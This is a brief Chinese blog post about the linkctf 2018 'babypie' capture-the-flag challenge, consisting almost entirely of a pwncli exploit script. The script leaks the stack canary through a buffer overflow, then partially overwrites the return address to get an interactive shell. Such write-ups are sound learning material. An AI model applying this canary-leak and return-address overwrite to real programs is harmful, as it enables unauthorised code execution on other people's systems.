linkctf_2018-7_babypie

linkctf_2018.7_babypie

总结

baby中的baby，记录下exp，水一篇博客。

Exp

from pwncli import *

cli_script()

p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']

p.sendafter("Input your Name:\n", "a" * 0x29)
p.recvuntil("a" * 0x29)
msg = p.recvn(7)
canary = (u64(msg+b"\x00")) << 8
log_address("canary", canary)

p.send(flat(["a"*0x28, canary, 0, "\x3e"]))

p.interactive()

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli

标签：pwncli,0x29,linkctf,gift,elf,babypie,2018,msg
来源： https://www.cnblogs.com/LynneHuan/p/15229810.html